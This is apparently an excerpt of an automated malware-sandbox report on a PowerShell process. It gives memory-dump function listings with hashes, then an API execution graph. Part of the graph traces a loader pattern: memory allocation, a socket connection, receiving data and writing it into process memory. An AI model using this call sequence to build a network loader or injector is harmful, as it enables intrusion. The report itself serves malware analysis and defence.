                                                                                    • API String ID:
                                                                                    • Opcode ID: 8c9f9161cf2657c3d6518f161b36377511c2365333bd43334b4eb2a620611666
                                                                                    • Instruction ID: b2a32395546770e4bca07d8ccd0443ab7eb430294cce3a39f585b457f4eee921
                                                                                    • Opcode Fuzzy Hash: 8c9f9161cf2657c3d6518f161b36377511c2365333bd43334b4eb2a620611666
                                                                                    • Instruction Fuzzy Hash: A2E086757083615BC304577CA8194297BD5D7CDAE134440BBE54DC7281D919AC248795
                                                                                    Function 04A0C590 Relevance: .0, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7e738ad349d87ebc815dbc824d47a54ee4a8c6b254a70f1bbd44e5a01690cad
                                                                                    • Instruction ID: 3798a13228d432696f581c2b64fa27915e6ab03642518877d6acc23882800c42
                                                                                    • Opcode Fuzzy Hash: f7e738ad349d87ebc815dbc824d47a54ee4a8c6b254a70f1bbd44e5a01690cad
                                                                                    • Instruction Fuzzy Hash: C8D0A7793003116B860467ADB40946D77D9D7C99E1340403AEA0DC3344DE259C1587D4
                                                                                    Function 04A0F470 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                    • Instruction ID: 9c21d3b5b8c0c1685b67bbc501507b7d4cc9a8cf7c60a7f7fe624829d87963ca
                                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                    • Instruction Fuzzy Hash: 0AD017B0D002099F8780EFACC84156EFBF4EB48200F20C5AA8908E3301F7329A12CBD1
                                                                                    Function 04A08748 Relevance: .0, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e9fd3c7d6a2732b37c1b93bdaab8a485db11e1b046e41f4f588e9411f2716451
                                                                                    • Instruction ID: 7f6dedde079c8546b8496bf83250ad874f7ff77156c95ff828d882bdf0db4664
                                                                                    • Opcode Fuzzy Hash: e9fd3c7d6a2732b37c1b93bdaab8a485db11e1b046e41f4f588e9411f2716451
                                                                                    • Instruction Fuzzy Hash: A5D017308042098FCF48BBA4E85B4BDBB34FA10301F418169D907521D5EA352A6ACAC5
                                                                                    Function 04A08810 Relevance: .0, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 347a1040ff67e53d31996c8f2af94c516579b62ac466ed29d8596f4e159fa267
                                                                                    • Instruction ID: 59d01d3c0526a4632ef3e892d7f57e03b521941d106d9432b20f474c21881200
                                                                                    • Opcode Fuzzy Hash: 347a1040ff67e53d31996c8f2af94c516579b62ac466ed29d8596f4e159fa267
                                                                                    • Instruction Fuzzy Hash: E6D01234A0830A8FCB48EFA4E44646DBFB5A744300F008159D94593384EA346811CBC5
                                                                                    Function 04A07932 Relevance: .0, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7abf297ed2e9278f39ebb6ffd41f72278319e66d5de32019a079a27ec726424b
                                                                                    • Instruction ID: c097aecb64355e66317c319276d2de9b331854b5c27095009f12c46b31e930af
                                                                                    • Opcode Fuzzy Hash: 7abf297ed2e9278f39ebb6ffd41f72278319e66d5de32019a079a27ec726424b
                                                                                    • Instruction Fuzzy Hash: C7D0C93414D7C4AFCB5B9F7995948193F706E4313431A44EFD98A9F1B3CA268489DF06
                                                                                    Function 04A07EA0 Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 99e647f31cf7a18eb61f3c5976290f122290f9eab97c500f2850799774292b8d
                                                                                    • Instruction ID: 2aae140229547438c29f9d8f5b9feefdd9de7fae673b326d39e1b0af07663a1c
                                                                                    • Opcode Fuzzy Hash: 99e647f31cf7a18eb61f3c5976290f122290f9eab97c500f2850799774292b8d
                                                                                    • Instruction Fuzzy Hash: CDC08C0A40E3C00EEF03833458D914ABFB10E8343930A41CBC081CEC63C4188C0BC703
                                                                                    Function 04A07940 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2d6d9a6e92b5023819f18acad0081dd71444539ae9173d73ea11ab87ce30b30f
                                                                                    • Instruction ID: 71c6038ceb9241d229774ee1509931a95f21705f4ff5fa8c38637031ecc4727c
                                                                                    • Opcode Fuzzy Hash: 2d6d9a6e92b5023819f18acad0081dd71444539ae9173d73ea11ab87ce30b30f
                                                                                    • Instruction Fuzzy Hash: 6BB09230044B08CFC648AFB5A4048147329BB4021538104A9EE0E1A2928F36E888DE48

                                                                                    Non-executed Functions

                                                                                    Function 077E1BE0 Relevance: 20.4, Strings: 16, Instructions: 406COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $c;k$4'tq$4'tq$4'tq$4'tq$84Fl$84Fl$tPtq$tPtq$JIl$JIl$JIl$JIl$JIl$rHl$rHl
                                                                                    • API String ID: 0-2538519358
                                                                                    • Opcode ID: cacae04502644dab8f0f48bb7524bc5fedb1ee12181a9a412eb7fe9a06361b92
                                                                                    • Instruction ID: 6d846ecb2421dcc7198e1ee45aeda93c0b2888ece446c29793019e5e885dcd8b
                                                                                    • Opcode Fuzzy Hash: cacae04502644dab8f0f48bb7524bc5fedb1ee12181a9a412eb7fe9a06361b92
                                                                                    • Instruction Fuzzy Hash: 4CD14CB1B0420A8FCB25CB69C411A66FBBABFC9391F14C4ABD515CF256DB31C891C7A1
                                                                                    Function 077E3928 Relevance: 12.8, Strings: 10, Instructions: 320COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq$$tq$>l$>l
                                                                                    • API String ID: 0-2759691463
                                                                                    • Opcode ID: dd740f8adca086d536004acf34e257a3a0dddc699236ad66dbc038ec9fe8a752
                                                                                    • Instruction ID: e0c4ec847208efad25c69e67c53c0e5dd432e5bf5cfb4b30499e07beb1cbaaef
                                                                                    • Opcode Fuzzy Hash: dd740f8adca086d536004acf34e257a3a0dddc699236ad66dbc038ec9fe8a752
                                                                                    • Instruction Fuzzy Hash: ABA168B17043559FD7219B798811B76BBBAAFCA290F14846AE446CF291DB31CC81C7A1
                                                                                    Function 077E0FB8 Relevance: 12.7, Strings: 10, Instructions: 184COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: fyq$84Fl$`Qtq$`Qtq$tPtq$$tq$$tq$$tq$$tq$$tq
                                                                                    • API String ID: 0-761189167
                                                                                    • Opcode ID: e8ecfaf15a5c447669c4f5e3f389124b9e2e0f01abd080c7f4b6604a45bc180d
                                                                                    • Instruction ID: 88e3fc40696d2bb3859ee323e23a9ce7c794d6aa8dc66ed01656a2996140b1e2
                                                                                    • Opcode Fuzzy Hash: e8ecfaf15a5c447669c4f5e3f389124b9e2e0f01abd080c7f4b6604a45bc180d
                                                                                    • Instruction Fuzzy Hash: 5061AEB070420EDFDB24CE49C846BAAB7BABF4D391F958855E8019B290C735DD90CBA1
                                                                                    Function 077E3678 Relevance: 8.9, Strings: 7, Instructions: 194COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$$tq$$tq$$tq$>l$>l
                                                                                    • API String ID: 0-3697895749
                                                                                    • Opcode ID: abe35def053f3393e21e7fe51cbe94757cad72da14a58518413a87d84e312f49
                                                                                    • Instruction ID: ecbbff83b8ea7778623439dc0c97bdcdb673a323fdd073eb2daa65a461a3f801
                                                                                    • Opcode Fuzzy Hash: abe35def053f3393e21e7fe51cbe94757cad72da14a58518413a87d84e312f49
                                                                                    • Instruction Fuzzy Hash: A3515CF17043469FDB2586798811B6AFBFAAFCA2A1F24847BD445CB251DB31C881C7A1
                                                                                    Function 077E0284 Relevance: 7.6, Strings: 6, Instructions: 143COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$4'tq$4'tq$$tq$$tq
                                                                                    • API String ID: 0-1361008733
                                                                                    • Opcode ID: 4a5aebff1410b713a8dfd50848c2997b782767692f307a95ca16a2ad88de175c
                                                                                    • Instruction ID: 10707209b4660b58ff58d7a08ea20fc71c943b21bfd13ffc85b76da026009f83
                                                                                    • Opcode Fuzzy Hash: 4a5aebff1410b713a8dfd50848c2997b782767692f307a95ca16a2ad88de175c
                                                                                    • Instruction Fuzzy Hash: DD41E4B160E3D54FC72752782C205A6AFB95F8B19073A05DBC481DF297D9944C4AC3B3
                                                                                    Function 04A07A21 Relevance: 6.5, Strings: 5, Instructions: 241COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: tMHl$`uq$`uq$`uq$`uq
                                                                                    • API String ID: 0-2489500751
                                                                                    • Opcode ID: 75b19a6527044d1c7940923adf10aa5264449134f10e4917d04a4af9ac774b5a
                                                                                    • Instruction ID: db55d47dfb731e3cd01d35f0bb49617a9a75fb5fca19289d19a0be42f6ed6034
                                                                                    • Opcode Fuzzy Hash: 75b19a6527044d1c7940923adf10aa5264449134f10e4917d04a4af9ac774b5a
                                                                                    • Instruction Fuzzy Hash: C0B1A574A006099FDB45DFA9D480A9DFBF2FF88300F108629E419AB355EB34A945CF91
                                                                                    Function 04A07A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: tMHl$`uq$`uq$`uq$`uq
                                                                                    • API String ID: 0-2489500751
                                                                                    • Opcode ID: 0f436721e228a38b6ddde8c466285b6cd773f2b87bf0232016588576faf3f07c
                                                                                    • Instruction ID: 0fb63bc3a6df859c04a2e950473d00ab62232c971dbe1e0d91becc7d8049b745
                                                                                    • Opcode Fuzzy Hash: 0f436721e228a38b6ddde8c466285b6cd773f2b87bf0232016588576faf3f07c
                                                                                    • Instruction Fuzzy Hash: ACB18574E006099FDB54DFA9D980A9DFBF2FF88300F108629E419AB354EB74A945CF91
                                                                                    Function 04A07210 Relevance: 6.5, Strings: 5, Instructions: 216COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: tMHl$`uq$`uq$`uq$`uq
                                                                                    • API String ID: 0-2489500751
                                                                                    • Opcode ID: c638bc83c0b3dbe3ebf7938920a4834fed424bccc2957bfa4ccac27c086ab942
                                                                                    • Instruction ID: d5235e1254afd84b7e6ebf0370dbafa46579896e17e7e38ac3a3e192674251d4
                                                                                    • Opcode Fuzzy Hash: c638bc83c0b3dbe3ebf7938920a4834fed424bccc2957bfa4ccac27c086ab942
                                                                                    • Instruction Fuzzy Hash: D9A19378E006099FDB54DFA9D990A9DFBF2FF48300F108629E419AB355EB34A945CF90
                                                                                    Function 077E2270 Relevance: 5.1, Strings: 4, Instructions: 128COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: JIl$JIl$JIl$JIl
                                                                                    • API String ID: 0-3186157469
                                                                                    • Opcode ID: b057c390c86d417d9aa87e9c18461440e08cb3d40aeef0b07cdf9cea43f32a44
                                                                                    • Instruction ID: c1b7353db6a0560abeca2696a5acc05cc618333dcc1f20265f8b7be0bf85a351
                                                                                    • Opcode Fuzzy Hash: b057c390c86d417d9aa87e9c18461440e08cb3d40aeef0b07cdf9cea43f32a44
                                                                                    • Instruction Fuzzy Hash: 9041E7F16087559FCB218B648401AA6BFBCBF4B290F0984A7D8549F553C734C984CBA2
                                                                                    Function 077E5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $tq$$tq$$tq$$tq
                                                                                    • API String ID: 0-173548568
                                                                                    • Opcode ID: 4c9547673886fefb5b23f54b6b38655612da001a736ffdca0cfbc406cd6dd233
                                                                                    • Instruction ID: a82c34ca5400ff80e7a903a8ead412f106ad5082d19ff919c0fa3017cc4a3e9e
                                                                                    • Opcode Fuzzy Hash: 4c9547673886fefb5b23f54b6b38655612da001a736ffdca0cfbc406cd6dd233
                                                                                    • Instruction Fuzzy Hash: 7C2168B271421AABEB34553E9C10B37B7DE9BC9398F24843AE905CB381ED75C8618361
                                                                                    Function 077E2108 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $tq$$tq$JIl$JIl
                                                                                    • API String ID: 0-3054621161
                                                                                    • Opcode ID: 2e338b2dca8be57632cc3b8e8a117164111039e371950ff6bceb2127d72b268a
                                                                                    • Instruction ID: 908324204fe36f57fc58f4f15679639f572d4db6ed923529a0ff1f04e3c27535
                                                                                    • Opcode Fuzzy Hash: 2e338b2dca8be57632cc3b8e8a117164111039e371950ff6bceb2127d72b268a
                                                                                    • Instruction Fuzzy Hash: A901CCB260E7924FC723922C9C1085AAF6E6F87290B1949D7C684DF26BC9348E45C363

                                                                                    Execution Graph

                                                                                    Execution Coverage:6.8%
                                                                                    Dynamic/Decrypted Code Coverage:82.1%
                                                                                    Signature Coverage:0.1%
                                                                                    Total number of Nodes:1578
                                                                                    Total number of Limit Nodes:44
                                                                                    execution_graph 72062 10011a40 72063 10011a52 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J 72062->72063 72064 10011a6c ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 72062->72064 72067 10011b47 72063->72067 72065 10011b04 72064->72065 72066 10011a8d 72064->72066 72065->72067 72068 10011b1b fwrite 72065->72068 72066->72065 72069 10011ac1 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 72066->72069 72068->72067 72072 100036d0 memcpy 72069->72072 72071 10011ad8 ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH 72071->72065 72072->72071 72073 65c4a4 72085 40ec94 GetModuleHandleW 72073->72085 72077 65c502 72090 5a2f2c SendMessageW 72077->72090 72079 65c519 72091 6511e0 287 API calls 72079->72091 72081 65c51e 72092 5a2a3c SetWindowTextW SetWindowTextW 72081->72092 72083 65c552 ShowWindow 72084 65c59e 72083->72084 72086 40eccf 72085->72086 72093 40817c 72086->72093 72088 40ecdb GetWindowLongW SetWindowLongW SetErrorMode 72089 651170 GetProcAddress GetProcAddress GetModuleHandleW 72088->72089 72089->72077 72090->72079 72091->72081 72092->72083 72094 4081b4 72093->72094 72097 408110 72094->72097 72098 408158 72097->72098 72099 408120 72097->72099 72098->72088 72099->72098 72101 40e56c GetSystemInfo 72099->72101 72101->72099 72102 650467 72103 650482 72102->72103 72122 5a2a3c SetWindowTextW SetWindowTextW 72103->72122 72105 650529 72238 5afdc4 GetFileAttributesW 72105->72238 72107 650533 72108 650537 72107->72108 72109 65055b 72107->72109 72239 64e240 67 API calls 72108->72239 72110 650574 72109->72110 72111 650564 72109->72111 72123 64f1dc 72110->72123 72241 64ebbc 15 API calls 72111->72241 72115 650556 72240 426460 64 API calls 72115->72240 72116 650569 72117 650572 72116->72117 72242 64ed7c 90 API calls 72116->72242 72243 600808 GetWindowLongW DestroyWindow SendMessageW 72117->72243 72121 650597 72122->72105 72124 64f20f 72123->72124 72125 64f226 72124->72125 72126 64f22d 72124->72126 72273 646274 6 API calls 72125->72273 72128 64f25f 72126->72128 72129 64f26b 72126->72129 72274 600654 25 API calls 72128->72274 72131 64f295 72129->72131 72133 64f297 72129->72133 72134 64f28b 72129->72134 72244 6013d8 57 API calls 72131->72244 72276 60137c 58 API calls 72133->72276 72275 601198 62 API calls 72134->72275 72135 64f2e2 72245 6013d8 57 API calls 72135->72245 72139 64f2fd 72246 6013d8 57 API calls 72139->72246 72141 64f318 72247 5b03f8 GetCommandLineW 72141->72247 72143 64f320 72248 6013d8 57 API calls 72143->72248 72145 64f338 72249 646424 57 API calls 72145->72249 72147 64f33d 72250 64eb08 15 API calls 72147->72250 72149 64f344 72251 620f38 MultiByteToWideChar LocalAlloc TlsSetValue TlsGetValue TlsGetValue 72149->72251 72151 64f417 72252 64eb08 15 API calls 72151->72252 72152 64f370 72157 64f3d3 72152->72157 72277 646d0c 67 API calls 72152->72277 72154 64f430 72253 61e7a8 MultiByteToWideChar 72154->72253 72157->72151 72279 646d0c 67 API calls 72157->72279 72158 64f3ce 72278 426460 64 API calls 72158->72278 72159 64f44e 72165 64f45c 72159->72165 72281 5f8384 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 72159->72281 72162 64f412 72280 426460 64 API calls 72162->72280 72254 647340 57 API calls 72165->72254 72167 64f493 72169 64f4b2 72167->72169 72282 5f8384 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 72167->72282 72283 64449c 125 API calls 72169->72283 72171 64f4c7 72172 64f5fc 72171->72172 72255 643e0c 58 API calls 72171->72255 72173 64f68d 72172->72173 72287 63b45c 80 API calls 72172->72287 72175 64f6c7 72173->72175 72290 64e240 67 API calls 72173->72290 72292 64e97c 80 API calls 72175->72292 72177 64f4d6 72256 6447d4 72177->72256 72180 64f655 72180->72173 72288 6013d8 57 API calls 72180->72288 72182 64f6bd 72182->72175 72291 426460 64 API calls 72182->72291 72186 64f688 72289 426460 64 API calls 72186->72289 72187 64f703 72190 64f705 Sleep 72187->72190 72191 64f722 72187->72191 72296 5a2ef0 166 API calls 72190->72296 72297 5b1cf8 GetProcAddress GetProcAddress GetModuleHandleW GetModuleHandleW 72191->72297 72193 64f6d0 72193->72187 72293 64e240 67 API calls 72193->72293 72294 426460 64 API calls 72193->72294 72295 61e7f0 6 API calls 72193->72295 72196 64f751 72298 64e074 96 API calls 72196->72298 72198 64f756 72299 64e97c 80 API calls 72198->72299 72199 64f4db 72284 64f0c4 107 API calls 72199->72284 72202 64f75f GetTickCount 72204 64f783 72202->72204 72203 64f55d 72285 63acfc MultiByteToWideChar DestroyIcon LoadCursorW LoadCursorW 72203->72285 72300 60165c 57 API calls 72204->72300 72207 64f569 72286 63adf4 77 API calls 72207->72286 72209 64f838 72304 60165c 57 API calls 72209->72304 72211 64f88a 72212 64f8c2 72211->72212 72305 5a2ef0 166 API calls 72211->72305 72306 64e97c 80 API calls 72212->72306 72213 64f7a9 72213->72209 72215 64f7f3 72213->72215 72216 64f85d 72213->72216 72301 63b45c 80 API calls 72215->72301 72303 6013d8 57 API calls 72216->72303 72218 64f89f GetTickCount 72218->72212 72220 64f8ae MsgWaitForMultipleObjects 72218->72220 72220->72211 72222 64f826 72222->72209 72302 6013d8 57 API calls 72222->72302 72223 64f8e1 72224 64f8e7 72223->72224 72225 64f923 72223->72225 72227 64f921 72224->72227 72307 64e240 67 API calls 72224->72307 72228 64f953 72225->72228 72308 64e240 67 API calls 72225->72308 72310 64e97c 80 API calls 72227->72310 72228->72227 72309 6013d8 57 API calls 72228->72309 72233 64f975 72234 64fa16 72233->72234 72311 63b1f4 80 API calls 72233->72311 72312 5b1d88 GetProcAddress GetProcAddress GetModuleHandleW 72234->72312 72237 64fa4b 72237->72117 72238->72107 72239->72115 72241->72116 72242->72117 72243->72121 72244->72135 72245->72139 72246->72141 72247->72143 72248->72145 72249->72147 72250->72149 72251->72152 72252->72154 72253->72159 72254->72167 72255->72177 72313 5b09c4 GetSystemDirectoryW 72256->72313 72258 6447f8 72314 5b09c4 GetSystemDirectoryW 72258->72314 72260 64481b 72315 428614 SetErrorMode 72260->72315 72262 644840 72263 428614 2 API calls 72262->72263 72264 64484d 72263->72264 72265 644880 72264->72265 72318 421a6c 72264->72318 72322 411e58 GetProcAddress GetProcAddress 72265->72322 72269 644890 72271 6448a6 72269->72271 72323 5f8384 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 72269->72323 72271->72199 72273->72126 72274->72129 72275->72131 72276->72131 72277->72158 72279->72162 72281->72165 72282->72169 72283->72171 72284->72203 72285->72207 72286->72172 72287->72180 72288->72186 72290->72182 72292->72193 72293->72193 72295->72193 72296->72187 72297->72196 72298->72198 72299->72202 72300->72213 72301->72222 72302->72209 72303->72209 72304->72211 72305->72218 72306->72223 72307->72227 72308->72228 72309->72227 72310->72233 72311->72234 72312->72237 72313->72258 72314->72260 72324 4097c8 72315->72324 72326 421a94 72318->72326 72321 5f8384 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 72321->72265 72322->72269 72323->72271 72325 4097ce LoadLibraryW 72324->72325 72325->72262 72329 421ac4 72326->72329 72328 421a8c 72328->72321 72330 421acd 72329->72330 72333 421b2d 72330->72333 72335 42197c 72330->72335 72332 421b94 72332->72328 72333->72332 72334 42197c 9 API calls 72333->72334 72334->72333 72338 421dfc 72335->72338 72348 4221fc 72338->72348 72340 421e11 VirtualAlloc WSAStartup socket 72341 421e7e VirtualProtect WriteProcessMemory connect 72340->72341 72343 42209f 72341->72343 72344 4220a8 recv 72343->72344 72345 4220ec closesocket 72343->72345 72344->72343 72346 4220d4 72344->72346 72347 421995 72345->72347 72346->72345 72346->72347 72347->72333 72349 422223 72348->72349 72350 4222b6 LoadLibraryA 72349->72350 72351 4222f7 72350->72351 72351->72340 72352 2715eb2 Sleep 72355 2716f17 72352->72355 72357 2716f21 72355->72357 72358 2715ec9 72357->72358 72362 2716f3d std::exception::exception 72357->72362 72367 2716e83 72357->72367 72384 2718550 DecodePointer 72357->72384 72360 2716f7b 72386 2716e24 66 API calls std::exception::operator= 72360->72386 72362->72360 72385 27173e9 76 API calls __cinit 72362->72385 72363 2716f85 72387 2717836 RaiseException 72363->72387 72366 2716f96 72368 2716f00 72367->72368 72376 2716e91 72367->72376 72394 2718550 DecodePointer 72368->72394 72370 2716f06 72395 271710d 66 API calls __getptd_noexit 72370->72395 72373 2716ebf RtlAllocateHeap 72373->72376 72383 2716ef8 72373->72383 72375 2716eec 72392 271710d 66 API calls __getptd_noexit 72375->72392 72376->72373 72376->72375 72380 2716eea 72376->72380 72381 2716e9c 72376->72381 72391 2718550 DecodePointer 72376->72391 72393 271710d 66 API calls __getptd_noexit 72380->72393 72381->72376 72388 2718508 66 API calls 2 library calls 72381->72388 72389 2718359 66 API calls 7 library calls 72381->72389 72390 2718098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 72381->72390 72383->72357 72384->72357 72385->72360 72386->72363 72387->72366 72388->72381 72389->72381 72391->72376 72392->72380 72393->72383 72394->72370 72395->72383 72396 2714274 72397 272f814 CreateThread 72396->72397 72399 2716110 72397->72399 72400 27300d5 72399->72400 72401 403f88 72402 4041e8 72401->72402 72403 403fa0 72401->72403 72404 404300 72402->72404 72405 4041ac 72402->72405 72412 403fb2 72403->72412 72417 40403d Sleep 72403->72417 72406 403d34 VirtualAlloc 72404->72406 72407 404309 72404->72407 72413 4041c6 Sleep 72405->72413 72415 404206 72405->72415 72409 403d6f 72406->72409 72410 403d5f 72406->72410 72408 403fc1 72425 403ce8 Sleep Sleep 72410->72425 72411 4040a0 72424 4040ac 72411->72424 72426 403c6c 72411->72426 72412->72408 72412->72411 72418 404081 Sleep 72412->72418 72413->72415 72416 4041dc Sleep 72413->72416 72419 403c6c VirtualAlloc 72415->72419 72423 404224 72415->72423 72416->72405 72417->72412 72420 404053 Sleep 72417->72420 72418->72411 72422 404097 Sleep 72418->72422 72419->72423 72420->72403 72422->72412 72425->72409 72430 403c00 72426->72430 72428 403c75 VirtualAlloc 72429 403c8c 72428->72429 72429->72424 72431 403ba0 72430->72431 72431->72428 72432 d90032 72442 d90ae4 GetPEB 72432->72442 72435 d90ae4 GetPEB 72438 d902a7 72435->72438 72436 d904a6 GetNativeSystemInfo 72437 